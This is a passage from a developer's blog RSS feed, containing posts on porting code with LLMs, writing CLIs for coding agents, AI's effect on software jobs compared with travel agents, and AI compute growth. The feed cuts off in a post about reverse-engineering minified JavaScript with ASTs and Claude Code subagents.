<p>I noted that Galen Hunt from Microsoft put a (not very well worded, and quickly edited) post on LinkedIn looking for a principal software engineer to just this.
<img src="https://martinalderson.com/img/galen-hunt-linkedin-post.png" alt="Galen Hunt's LinkedIn post" style="max-width: 50%; display: block; margin: 20px auto;"></p>
<p>Galen did substantially backtrack on this I should add, and said it was just a research project. Regardless, I think it's a really interesting look into the future of where things may end up. For 'legacy' codebases that <em>also</em> have excellent tests around them, I think agents can really shine working in loops transposing codebases from one language to another.</p>
<h2>Ironically, LLMs may enable many more esoteric languages</h2>
<p>To sum up, I think LLMs are actually going to enable a new 'golden' period of language innovation. New programming languages will be able to port huge quantities of existing libraries - which is usually the main thing holding back adoption of new development ecosystems.</p>
<p>The best library ecosystem used to win. Now you can just bring the libraries with you.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/ported-photoshop-1-to-csharp-in-30-minutes/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/ported-photoshop-1-to-csharp-in-30-minutes/</guid>
      <pubDate>Mon, 05 Jan 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Why I&#39;m building my own CLIs for agents</title>
      <description>MCP tools eat thousands of tokens. A simple CLI with instructions in your CLAUDE.md file uses 71 tokens and works brilliantly.</description>
      <content:encoded><![CDATA[<p>Over the past few months I've found my enthusiasm for MCP somewhat wane. The core vision - of connecting any data source to an LLM easily - is brilliant. But ironically the lowly CLI may be far better suited. And I've found building your own CLIs is trivial to do.</p>
<h2>MCP's context length problem</h2>
<p>Like mass and the rocket formula for space, LLMs have a similar constraint on context length. Processing a session requires <em>compute resources</em> that scale non-linearly. While memory grows linearly, the <em>complexity of attention</em> means that a 100,000 token session is significantly harder and slower to manage than a 10,000 token session. This becomes a real problem as context windows get into the hundreds of thousands or millions of tokens<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>.</p>
<p>While there is loads of interesting research going on to get round this, it does mean that long context windows are currently expensive and slow to deal with.</p>
<p>This really uncovers MCPs biggest weakness - it unfortunately in the current design ends up using a <em>lot</em> of tokens.</p>
<p><img src="https://martinalderson.com/img/mcp-token-usage.png" alt="MCP token usage showing nearly 15,000 tokens"></p>
<blockquote>
<p><em>cries in tokens</em></p>
</blockquote>
<p>Adding the popular <a href="https://github.com/microsoft/playwright-mcp">Playwright MCP</a> uses nearly 15,000 tokens out of the box. This is &gt;10% of the <em>entire</em> context window you get to use in Claude Code just for the definitions of the various tools Playwright defines.</p>
<p>In &quot;chat&quot; UIs with LLMs I don't think this is usually as big a problem - you tend to not to rack up tokens so quickly researching products or making SVGs of various animals.</p>
<p>But with agents it's a real problem. I noticed this recently using the Linear MCP, which was great but ended up using so many tokens for the definitions that I was hitting context length limits <em>far</em> more often. I spent some time trying to disable various tools (I only really needed 2 or 3) but Claude Code <a href="https://github.com/anthropics/claude-code/issues/7328">doesn't seem to support</a> disabling MCP tools selectively.</p>
<p>There is a lot of work going on to solve this - one idea is to have a central MCP 'search' that allows the agent to search for a specific tool and it's definitely worth keeping <a href="https://www.anthropic.com/engineering/advanced-tool-use">a close eye</a> on. I'm sure 2026 will have many more developments around this area.</p>
<h2>You don't need most tools until you do</h2>
<p>The obvious alternative is to just disable MCP servers until you need them and then re-enable them. While this works, the UX is pretty poor. It also means that the agent doesn't know about them until you enable them, which is often backwards - you want the <em>agent</em> to know what tools to call.</p>
<p>And fundamentally I've found that I don't need that many tools regularly - until I do. Take Linear - when doing 'ticket driven development' with agents I really only need create issue, read issue and update issue status. But then you want to add an attachment or create labels or what not and (even if you could selectively disable tools) you are in a mess.</p>
<h2>Enter the humble CLI</h2>
<p>After spending a while trying to resolve the Linear MCP context issue I gave up and installed the excellent <a href="https://github.com/dorkitude/linctl">linctl</a> CLI and put these instructions in to my AGENTS/CLAUDE.md file:</p>
<pre><code>  # Create an issue
  linctl issue create --title &quot;Fix bug&quot; --assign-me

  # Update issue state
  linctl issue update ABC-123 --state &quot;In Progress&quot;
  linctl issue update ABC-123 --state &quot;Done&quot;
  
  For other commands: linctl --help 
</code></pre>
<p>This is 71 tokens, vs the many thousands of the Linear MCP and it works <em>brilliantly</em>. The agent always knows how to update and create issues for that project, and as it's checked into source code everyone else who uses agents on the project is on the same page.</p>
<h2>Building your own CLIs for everything</h2>
<p>As this pattern worked so well, I realised that I could use this for non-software engineering tasks. It's <em>trivial</em> for coding agents to take e.g. an OpenAPI API spec and build a good CLI tool out of it in a few minutes - if someone already hasn't built one. You can also just copy paste the API docs into Claude Code if they don't have an OpenAPI spec and Claude will usually figure it out.</p>
<p>I've actually taken this a bit further and built CLIs for various websites that don't even expose a public API by browsing the site doing various actions I want to do, exporting it as a HAR file in devtools and then telling Claude to build a CLI based on the key (internal) endpoints of the HAR file. Your mileage may vary, but I use a couple of 'legacy' systems regularly and this alone has saved me <em>so much time</em>.</p>
<p>For example, you can set up a Gmail CLI (I built a very simple one with the Gmail API - setting up the torturous Google OAuth scopes took longer than writing the code!), and a Calendar CLI and then start connecting all your other tools. You can do some wonderful stuff with this. For example, get it to find email(s) reporting a bug, get it to open a linear ticket, fix it, then write a draft email in reply with the key details of what was wrong and when it's likely to be pushed out to production to resolve.</p>
<blockquote>
<p>Be really careful YOLOing your personal data into random GitHub CLIs you find. If you're unsure it's often easier just to build your own from API docs.</p>
</blockquote>
<h2>Skills are great - but don't overlook the power of CLIs</h2>
<p>A lot of what I've been discussing has been standardised into <a href="https://www.anthropic.com/engineering/equipping-agents-for-the-real-world-with-agent-skills">Skills</a> which covers all this in far more detail. But I feel it sort of hides the importance of the CLI parts themselves. Furthermore, past simple helper scripts I'm not sure if you want to commit every single &quot;CLI&quot; into your repo in the skills folder - there are some real problems with it having to install dependencies, or if (like me) you are creating self contained binary CLIs you then end up with big problems running e.g. Mac binaries on Linux or vice versa.</p>
<p>I've also ended up just creating (git tracked) folders for each of the tasks I do day to day for each project (both software and non-software). It's great to be able to write clearly defined CLI instructions <em>just for that</em> project. How you use e.g. the Linear CLI in one project may be completely different to another project.</p>
<p>It really feels like this approach lives up to the MCP vision, without the token consumption problems that MCPs intrinsically have. While it's definitely not user friendly enough for non-technical folks to really understand, it does feel like I've just peered into the future.</p>
<p>I didn't have the rebirth of the terminal UI and me building dozens of CLIs on my 2025 prediction list, but here we are. I hope you have a fantastic 2026 - I'm not going to even try and guess what I'm going to be doing this time next year.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>This is why you see companies charging significantly more per token for &gt;200K tokens. And it's important to note even if we didn't have the compute and memory resource limits, you are still cluttering the context window with, at best, unrelated information and at worst contradictory information. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/why-im-building-my-own-clis-for-agents/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/why-im-building-my-own-clis-for-agents/</guid>
      <pubDate>Mon, 29 Dec 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Travel agents took 10 years to collapse. Developers are 3 years in.</title>
      <description>Travel agents are the classic example of an industry killed by the internet. Software engineering is facing the same disruption, but the timeline is compressed.</description>
      <content:encoded><![CDATA[<p>Travel agents are the go-to example of an industry killed by the internet. And the numbers are brutal: US agents numbered 124,000 in 2000. By 2012, that had fallen 47% to 65,000. Retail locations fell from 34,000 to 13,000<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>. But that collapse took a decade. The ones who survived did it by going upmarket. I keep thinking about this when I look at what's coming for software engineering - except this time, I don't think we get ten years.</p>
<h2>The history</h2>
<p>Interestingly, while researching this article there are some significant other factors at play. US airlines dramatically cut commissions in 1995 - which accounted for 60% of the average US travel agent's revenue prior to this.<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup></p>
<p>While it's hard to say how much of this commission cut was due to increasing digitisation of the booking services vs other factors, I feel this really does have parallels to the software engineering market, which had a huge boon with covid-era ZIRP causing arguably far too much capital to be allocated to software engineering and then a gradual but seemingly relentless pullback in job positions post that.</p>
<p>In many ways the commission cut led the travel agent industry to be in the worst possible position for the advent of the internet with serious almost overnight cashflow worries. I have no doubt this led the industry to be poorly prepared for the arguably much larger threat of OTAs - margins really started eroding but overall travel volumes continued to increase, masking the structural shift going on.</p>
<p>I do feel this is happening with software engineering positions and contracts right now. Many chats I have with people seem to blame the economy or other external factors for the big slowdown in openings. While there is some truth in this - there has been a ~$150bn decline in US VC funding<sup class="footnote-ref"><a href="#fn3" id="fnref3">[3]</a></sup> - I also hear a lot of managers and CTOs saying they are not needing to hire for additional software engineering positions and often aren't rehiring when employees leave.</p>
<h2>Things got a bit better, then got a lot worse</h2>
<p>Interestingly, employment in the US travel agent sector started to <em>increase</em> in the late 90s - due to record travel volumes. It was a classic 'make it up in volume' play, where margins started eroding because of the commission cut. Anecdotally I've heard of a lot of this happening in the custom software engineering market - with significant discounting going on to try and maintain/increase headline revenue numbers albeit at a (much) reduced margin.</p>
<p>It's important to keep in mind in 1999 <em>less than 5%</em> of travel was booked online - which seems incredibly alien to us now.<sup class="footnote-ref"><a href="#fn4" id="fnref4">[4]</a></sup></p>
<p>LLMs have got <em>far</em> more market share in <em>far</em> less time. This is the key reason I think the changes are going to be far more rapid. We're at ~2.5 years since the release of GPT-4 (the first model that could really attempt to code on any serious level) and LLM usage is &gt;40% of the <em>entire</em> US population.<sup class="footnote-ref"><a href="#fn5" id="fnref5">[5]</a></sup>
<img src="https://martinalderson.com/img/adoption-curves.png" alt="Technology adoption curves">
Even more astoundingly, according to the Stack Overflow developer survey LLM adoption in software engineering went from 0% in 2022 to 84% (!) in 2025.<sup class="footnote-ref"><a href="#fn6" id="fnref6">[6]</a></sup></p>
<h2>Who survived</h2>
<p>Interestingly, while the market contracted rapidly with OTAs seeing very rapid growth over the early 2000s, there were some markets that saw major growth.</p>
<p>Corporate &quot;TMCs&quot; (travel management companies) saw huge growth - the companies in charge of mass-booking employee travel on behalf of companies.</p>
<p>So did certain niche parts of the market - cruises especially (still 75% offline). Luxury travel <em>exploded</em> - Virtuoso up 211%<sup class="footnote-ref"><a href="#fn7" id="fnref7">[7]</a></sup> - arguably because they are accessing inventory that isn't available to anyone.</p>
<p>So it wasn't all bad news. There was certainly some resilience in the travel industry where there was more <em>complexity</em>, typically requiring multiple products packaged together with higher commissions on some products outweighing the wafer thin (or non-existent) commissions on airfare.</p>
<h2>Who didn't</h2>
<p>Generalist travel agents got completely wiped out. Retail travel agency establishments fell 59% between 1997 and 2013; from nearly 23,000 to under 10,000. If your job was to type customer requirements into Sabre, within a few years you were competing directly with a website that could do it faster and cheaper. The most commoditised work went first: simple point-to-point flights moved online almost immediately, and by 2002 agents who depended on airline ticketing had zero commission and no differentiation.</p>
<p>Between 2000 and 2020, around 60,000 agents exited the profession entirely. Growth in corporate and luxury travel offset some losses, but there was no retraining program. Most <em>didn't</em> &quot;move upmarket&quot;.</p>
<p>I think this is a very telling tale for software engineering. If your job is to translate requirements into code manually - and that's it - you're the generalist travel agent.</p>
<p>I'm still speaking to far too many software engineers who are dismissive of agentic tooling, or who treat it as a novelty rather than the thing that's coming for their job. If you're fighting it rather than leaning in, unless you're lucky enough to be in a specific niche, I suspect the market is going to look extremely ropey over the next five years.</p>
<p>That's not to say that software engineering is &quot;done&quot; - far from it. Some of the best engineers I know have leveraged it to <em>improve</em> quality while increasing productivity. For example - building better test suites, better observability and also prototype multiple directions to see what works best. Or they've hugely improved the quality of the UI/UX for MVPs if they lean backend.</p>
<h2>Software engineering doesn't have 10 years</h2>
<p>As the stats above show, adoption is extremely rapid. The other curve that is happening from my <a href="https://martinalderson.com/posts/are-we-dismissing-ai-spend-before-the-6x-lands/">last post</a> which blew me away is the improvement in agent success rates from <a href="https://metr.org/">METR</a>.</p>
<p><img src="https://martinalderson.com/img/metr-agent-success.png" alt="METR agent success rates"></p>
<p>Opus 4.5 has really startled me - it genuinely can do complex software engineering tasks which I'd expect a proficient developer to take hours in <em>minutes</em> with very few defects.</p>
<p>The real question is what happens over 2026. Are we going to see 'superhuman' agents that far surpass human abilities (either in speed, quality or some other dimension we haven't even thought about)? I don't know. But I'm not waiting around to find out.</p>
<h2>What does 'upmarket' look like?</h2>
<p>The real value now lies in domain knowledge: understanding how systems connect, knowing which data exists where, and grasping what the business actually needs. I've had outrageously good results taking my knowledge of internal and external data sources and getting LLM agents to synthesise it all together. That kind of work isn't going away: if anything, improvements in agentic coding mean you can do what would have required a team of 10 in what seems like a few afternoons.</p>
<p>The other move is to broaden. If you're a backend engineer who's always avoided frontend, now's the time - agents can bridge the gap while you learn. If you're frontend-only, lean into backend, devops, infrastructure. The engineers I see thriving are the ones who can own an entire problem end-to-end, not just their slice of it. The generalist travel agents got wiped out, but the generalist <em>engineers</em> - the ones who can move across the stack - are more valuable than ever.</p>
<p>Travel agents had ten years to figure this out. Most didn't. Developers are three years in, and the curve is steeper.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>Bureau of Labor Statistics, Occupational Employment and Wage Statistics, &quot;Travel Agents&quot; (SOC 41-3041), 2000-2024. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p><a href="https://www.chicagotribune.com/1995/03/28/airlines-commission-cap-could-ground-small-travel-agencies/">Chicago Tribune</a> <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn3" class="footnote-item"><p><a href="https://www.ft.com/content/7a787423-9466-4e55-8c0e-8811cfe44dd3">Financial Times</a> <a href="#fnref3" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn4" class="footnote-item"><p>PhoCusWright/Statista historical data on US online travel booking market share. <a href="#fnref4" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn5" class="footnote-item"><p><a href="https://www.elon.edu/u/news/2025/03/12/survey-52-of-u-s-adults-now-use-ai-large-language-models-like-chatgpt/">Elon University</a> <a href="#fnref5" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn6" class="footnote-item"><p>Stack Overflow Annual Developer Survey, 2023-2025. <a href="#fnref6" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn7" class="footnote-item"><p><a href="https://static.virtuoso.com/division-marketing/PR/VTW-2024-Releases/VTW%202024%20Trends%20Release_FINAL.pdf">Virtuoso</a> <a href="#fnref7" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/travel-agents-developers/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/travel-agents-developers/</guid>
      <pubDate>Sat, 27 Dec 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Are we dismissing AI spend before the 6x lands?</title>
      <description>Critics are judging models trained on last-gen hardware. There&#39;s a 6x wave of compute already allocated - and it&#39;s just starting to produce results.</description>
      <content:encoded><![CDATA[<p>You've heard the new narrative: AI scaling hit a wall, the capex is insane, the returns aren't there. But the critics are judging models trained on last-gen hardware. There's a 6x wave of compute already allocated - and it's just starting to produce results.</p>
<p>This post looks at how much compute is actually coming online - and the early signs of what it is achieving.</p>
<h2>The 6x</h2>
<p>Morgan Stanley did some excellent research looking at CoWoS (Chip-on-Wafer-on-Substrate) allocations for TSMC. CoWoS is TSMC's advanced 2.5D chip packaging technology and is used for nearly all leading silicon in artificial intelligence:</p>
<table>
<thead>
<tr>
<th>Customer</th>
<th>2023</th>
<th>2024</th>
<th>2025e</th>
<th>2026e</th>
<th>2026 Share</th>
</tr>
</thead>
<tbody>
<tr>
<td>NVIDIA</td>
<td>53</td>
<td>200</td>
<td>425</td>
<td>595</td>
<td><strong>60%</strong></td>
</tr>
<tr>
<td>Broadcom</td>
<td>23</td>
<td>68</td>
<td>85</td>
<td>150</td>
<td><strong>15%</strong></td>
</tr>
<tr>
<td>AMD</td>
<td>7</td>
<td>40</td>
<td>50</td>
<td>105</td>
<td><strong>11%</strong></td>
</tr>
<tr>
<td>AWS + Alchip</td>
<td>9</td>
<td>16</td>
<td>5</td>
<td>50</td>
<td><strong>5%</strong></td>
</tr>
<tr>
<td>Marvell</td>
<td>1</td>
<td>18</td>
<td>75</td>
<td>55</td>
<td><strong>6%</strong></td>
</tr>
<tr>
<td>Intel Habana</td>
<td>0</td>
<td>7</td>
<td>9</td>
<td>0</td>
<td><strong>0%</strong></td>
</tr>
<tr>
<td>GUC</td>
<td>1</td>
<td>1</td>
<td>2</td>
<td>10</td>
<td><strong>1%</strong></td>
</tr>
<tr>
<td>MediaTek</td>
<td>-</td>
<td>-</td>
<td>-</td>
<td>20</td>
<td><strong>2%</strong></td>
</tr>
<tr>
<td>Others</td>
<td>20</td>
<td>10</td>
<td>19</td>
<td>15</td>
<td><strong>2%</strong></td>
</tr>
<tr>
<td><strong>Total</strong></td>
<td>117</td>
<td>370</td>
<td>670</td>
<td>1000</td>
<td></td>
</tr>
</tbody>
</table>
<p>Firstly, we can see that total supply is estimated to go from 117,000 wafers to 1 million wafers, in just 4 years, with NVIDIA taking the lion's share of the supply. Interestingly though, Broadcom (which produces Google's TPUs) is taking 15% of that capacity, with AMD growing 15x for their MI300/MI400 series of AI chips.</p>
<p>This doesn't tell us the total story though - as chips are continually improving in FLOPs/mm² of wafer.</p>
<p>I did some napkin math<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> to try and convert this into exaFLOPs. This is a lot of guesswork on shipment mix, but I believe it should be roughly in the right ballpark:</p>
<table>
<thead>
<tr>
<th>Vendor</th>
<th>2023</th>
<th>2024</th>
<th>2025e</th>
<th>2026e</th>
</tr>
</thead>
<tbody>
<tr>
<td>Nvidia</td>
<td>5.7</td>
<td>23.1</td>
<td>58.4</td>
<td>99.2</td>
</tr>
<tr>
<td>AMD</td>
<td>0.06</td>
<td>0.94</td>
<td>2.30</td>
<td>8.86</td>
</tr>
<tr>
<td>Google TPU</td>
<td>0.32</td>
<td>1.39</td>
<td>4.34</td>
<td>12.98</td>
</tr>
<tr>
<td>AWS Trainium</td>
<td>0.08</td>
<td>0.23</td>
<td>0.11</td>
<td>1.52</td>
</tr>
<tr>
<td><strong>TOTAL</strong></td>
<td><strong>6.16</strong></td>
<td><strong>25.7</strong></td>
<td><strong>65.2</strong></td>
<td><strong>122.6</strong></td>
</tr>
</tbody>
</table>
<blockquote>
<p>Note the Google TPU stats assume a very aggressive ramp from Broadcom, which is somewhat in question. Again, this is napkin math.</p>
</blockquote>
<p>AI silicon flow is increasing dramatically - and really starts gathering steam into 2026.</p>
<p>If we look at <em>cumulative</em> installs, we start seeing a huge amount of exaFLOPs available across the globe - with a roughly 6x increase in global AI chip capacity between 2024 and 2026e.</p>
<p><img src="https://martinalderson.com/img/ai-capacity-chart.png" alt="Cumulative AI chip capacity in exaFLOPs"></p>
<p>It's difficult to undersell the implications of this growth. Between ChatGPT first launching and the end of 2026, the world will have nearly 50x more compute installed and available for us. To push an overused analogy arguably too far, the initial build of railways in the UK and US were closer to 10x over 10 years. This level of infrastructure buildout hasn't really been seen before in human history - probably WW2 military spend is the only thing that surpasses it as a proportion of GDP in the Western world.</p>
<h2>The lag</h2>
<p>Having said all that, there is a significant lag between a chip being finished with TSMC and it coming online - probably at least a month in absolutely ideal conditions. However, there have been significant delays with getting the latest GB200 series of AI accelerators as they require liquid cooling - which previous generations didn't. There have been a lot of rumours that this has been extremely difficult to get right, with widespread <a href="https://www.tomshardware.com/tech-industry/artificial-intelligence/nvidia-gb200-production-ramps-up-after-suppliers-tackle-ai-server-overheating-and-liquid-cooling-leaks">reports</a> of overheating and leaks from the liquid cooling system delaying the rollout of this generation of AI accelerators from Nvidia.</p>
<p>This doesn't even get into the serious power capacity constraints the datacentre industry is currently battling - a million wafers worth of Blackwell-class silicon implies a need for gigawatts of new power capacity. This physical bottleneck is likely to be the <em>true</em> governor on how fast that '2026e' column actually comes online.</p>
<p>On top of this - the <em>even larger</em> delay is from when a chip gets installed and powered on in a datacentre facility to training finishing. It's likely this process takes at least 6 months end to end - assuming no major problems or difficulties.</p>
<p>So when we look at 'current' models - we are looking really in the past, probably 12 months or so all things being equal. When I wrote this blog at the end of 2025 we're really just seeing the results of 2024's cumulative infrastructure buildout.</p>
<h2>Inference</h2>
<p>It's very important to point out though that not all of this compute is being allocated towards training. Proportionally more and more will be allocated to inference to serve current customers. However, at off peak times I'm sure that the big AI players are dedicating a lot of this spare inference compute allocation to new techniques like agentic reinforcement learning - which can be easily checkpointed and done &quot;off peak&quot;.</p>
<p>And let's not forget that an enormous amount of compute still is going to be allocated to training. Sam Altman has said in a recent interview that OpenAI would be profitable if it wasn't for training - no doubt the cost of researchers plays a big part, but compute has to be a huge part of the expenditure there.</p>
<h2>Why I'm so excited, and to be honest, scared</h2>
<p>Two models have really caught my eye recently - Opus 4.5 and Gemini 3. I <a href="https://martinalderson.com/posts/are-we-in-a-gpt4-style-leap-that-evals-cant-see/">wrote an article</a> a few weeks ago delving into them if you're interested to learn more, but the quick summary is that Opus 4.5 is a step change in terms of software engineering and Gemini 3 has graphic/UI design skills far ahead of other models.</p>
<p>A month or so later, I really agree with what I wrote there - while the benchmark scores were impressive, they massively undersell what a giant leap Opus 4.5 has been. Combined with Claude Code I've found that it really can do 30 minutes+ of software engineering with minimal (or no) babysitting. This is a step change from Anthropic's previous Sonnet 4.5 model - which required me to constantly interrupt its execution to correct its approach.</p>
<p>I've noticed two other more quantitatively sound approaches also backing up what I'm anecdotally seeing. Firstly, one of <a href="https://hal.cs.princeton.edu/">Princeton's HAL</a> agent benchmarks has been &quot;solved&quot; by the combination of Opus 4.5 and Claude Code:</p>
<img src="https://martinalderson.com/img/hal-benchmark-opus-4-5.png" alt="Opus 4.5 + Claude Code effectively solving the HAL benchmark" style="max-width: 500px; display: block; margin: 0 auto;">
<blockquote>
<p>Opus 4.5 + Claude Code effectively solving the benchmark, a massive jump from the previous SOTA.</p>
</blockquote>
<p>Secondly, <a href="https://metr.org/">METR</a> has been doing some fascinating work on seeing how long various models can operate on successfully. We're starting to see an enormous leap forward on this - with Opus 4.5 managing to complete software engineering tasks that would take a human <em>4+ hours</em> successfully in over 50% of cases.</p>
<p><img src="https://martinalderson.com/img/metr-long-horizon-tasks.png" alt="METR success rates on long-horizon tasks"></p>
<blockquote>
<p>Note the 50%+ success rate on tasks that take humans 4+ hours.</p>
</blockquote>
<p>Now, correlation doesn't equal causation, but it's hard to not notice the parallels between the performance here and the availability of compute.</p>
<p>But if you look closely at the timelines, you realise that this performance isn't the result of the massive wave of compute I just described. It's actually the result of the trickle that came before it.</p>
<h2>The zettascale future</h2>
<p>Look at the &quot;Cumulative Installs&quot; for 2024 versus 2026 in my table above.</p>
<p>Because of the installation and training lag I described earlier, <em>Opus 4.5 and Gemini 3 were likely trained on the 2024 install base.</em> They are the product of roughly ~36 exaFLOPs of global capacity.</p>
<p>We are looking at these PhD-level engineering capabilities and assuming they are the result of the current AI hype cycle. They aren't. They are the result of the infrastructure that was ordered <em>before</em> the mania truly set in.</p>
<p>The 100+ exaFLOPs coming online in 2025 and the 220+ in 2026? <strong>That compute hasn't even finished a training run yet.</strong></p>
<p>If Opus 4.5 is what we get from the 'trickle' of 2024 compute, what happens when the 'flood' of 2026 infrastructure actually finishes training the next generation? By 2030, if trends continue, we'll have nearly 30x more - a zettaFLOP (10<sup>21</sup> FLOPs). The scaling debate is about to get a lot more uncomfortable.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>Assumptions:</p>
<ul>
<li><strong>Nvidia:</strong> 2024 mix was 70% H100, 30% Blackwell; 2025 is 20% H200, 80% Blackwell; 2026 is 30% Blackwell, 70% Rubin</li>
<li><strong>AMD:</strong> Shifts from MI300X to MI350/400</li>
<li><strong>Google:</strong> Moves from v5p/v6e to v7</li>
<li>I also attempted to convert wafer size to each company's published or rumoured sizing (to estimate accelerators per wafer)</li>
</ul>
 <a href="#fnref1" class="footnote-backref">↩︎</a></li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/are-we-dismissing-ai-spend-before-the-6x-lands/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/are-we-dismissing-ai-spend-before-the-6x-lands/</guid>
      <pubDate>Mon, 22 Dec 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Minification isn&#39;t obfuscation - Claude Code proves it</title>
      <description>Using ASTs and AI agents to reverse engineer minified JavaScript in minutes instead of weeks</description>
      <content:encoded><![CDATA[<p><em>This is the first in a series of three articles I'm going to be releasing over the holiday season, on how I think agents are completely reshaping software engineering beyond pure productivity enhancements. If you'd like to get notified when they come out, please subscribe to my <a href="https://martinalderson.com/newsletter/">newsletter</a> or <a href="https://martinalderson.com/feed.xml">RSS feed</a>.</em></p>
<blockquote>
<p>Please respect terms of service for the software you inspect if it is external to your organisation. Many (but not all) licenses have exceptions for legitimate security research, and I think this approach has great potential in shining the light on the millions of lines of opaque JavaScript we run these days for good.</p>
</blockquote>
<p>One of my passions is web performance, which inevitably means spending a lot of time staring at minified source code. Whether you're trying to figure out why a bundle is bloated or debugging a production issue without source maps, anyone in the performance space knows the particular pain of reading minified JavaScript.</p>
<p>Of course, hopefully most software engineers know that the minification process that JavaScript uses doesn't actually secure anything. It just makes it very hard to read. And with the advent of React bundles in the <em>megabytes</em> you could easily spend a few days getting fully to grips with just one bundle. Fully reverse-engineering a production bundle used to take a specialised engineer days or weeks of masochistic effort.</p>
<p>That effort barrier vanished.</p>
<h2>The shift</h2>
<p>I realised somewhat by accident that LLMs can read minified JS like prose some years ago, by copying and pasting the wrong code into gpt-3.5 way back when. However, they had significant drawbacks (minified JS absolutely <em>chews</em> through tokens). Agents really have dramatically changed the calculus on this.</p>
<p>One of the most interesting parts of experimentation I've been doing recently is combining somewhat arcane software engineering techniques with agents. Combining these firstly makes me realise how much low hanging fruit is still out there with agents, and secondly how you can mitigate a lot of the context window limitations using them.</p>
<h2>ASTs + agents</h2>
<p>Abstract syntax trees express code as a tree structure that's easy to traverse and manipulate programmatically. Your browser actually makes ASTs out of every single script on every page you visit, in the background. They're one stage in turning code like JavaScript into fast, optimized machine code, enabling developers to do things like ship tens of megabytes of JS source to make a to-do list app (I jest, I think!).</p>
<p><img src="https://martinalderson.com/img/v8-compilation-pipeline.png" alt="V8 JavaScript compilation pipeline"></p>
<blockquote>
<p>There is loads more interesting material about this on the <a href="https://v8.dev/blog/background-compilation">v8 blog</a>.</p>
</blockquote>
<p>Minification strips away variable names, but it cannot strip away <strong>logical structure</strong>. As the diagram shows, a <code>Return</code> node or an <code>If</code> statement remains constant regardless of whether a variable is named <code>processPayment</code> or <code>z</code>.</p>
<p>This got me thinking. What if we took an AST parser, like <a href="https://github.com/acornjs/acorn">acorn</a> and told Claude Code to delve into some minified source code with it?</p>
<h2>Pulling it all together</h2>
<p>I was curious to compare two versions of a popular minified npm package to see what I could pull out. This is many megabytes of minified JS, and with the recent npm supply chain attacks, that makes me nervous - what was hiding in there?</p>
<p>I started by grabbing the two most recent versions using <code>npm view</code> and <code>npm pack</code>. I then told Claude Code to generate ASTs for both versions, process the diffed AST, spin up 10 subagents to focus on the most interesting parts, and synthesise everything into a final report.</p>
<p>The bottleneck for LLMs has always been context windows and token costs for large files. By using ASTs, we can get a logical representation of the entire file - (usually) fitting in the context window for each subagent - while also leaving space for each subagent to investigate its assigned logical branch.</p>
<p><img src="https://martinalderson.com/img/agent-security-flow.png" alt="Agent security analysis flow"></p>
<p>The results were eye-opening. The 10 subagents give you over a million tokens of combined context window, and the diffed AST gives them a solid starting point.</p>
<p>A quick scan through the report the Claude Code created in less than 10 minutes included:</p>
<ul>
<li>Feature flags and unreleased functionality</li>
<li>Logging and telemetry details</li>
<li>Internal architecture details not meant to be public-facing</li>
</ul>
<p>It was almost as good as running it against the actual source code of the product.</p>
<h2>This applies to everything you ship</h2>
<p>Keep in mind it is not just npm packages that can quickly be reverse engineered like this - nearly every React based website will tend to push all of the frontend code down to the user. It may be chunked, but an agent can usually quickly find the missing chunks. And most importantly: <em>people do not selectively secure the chunks themselves</em>, or at least I haven't come across anyone doing this.</p>
<p>So this effectively means a user can recreate your entire source code of your frontend web application without even a login (assuming that the login page <em>itself</em> is in the app - it's a perfect entry point).</p>
<p>Obviously they won't be able to access any data or APIs - assuming they are secured properly - but be aware that malicious parties <em>can</em> and I'm sure <em>are</em> doing this to get an understanding of your frontend.</p>
<h2>My recommendations</h2>
<p>This was always possible - this isn't a sophisticated new approach to evaluating code. However, going through an enormous JavaScript bundle used to take weeks. Now it takes minutes.</p>
<p>My recommendation if you believe you have sensitive IP - think functionality or algorithms, not API keys<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> - in your frontend is to start rethinking how you deploy this. You could secure your chunks so only users with a valid access token can access them, assuming you trust your users. You could split sensitive parts of the app off. Or there's the nuclear option: move code out of the frontend to the backend, like the good old days.</p>
<p>Obfuscation was never security - but it used to be effort. Not anymore.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
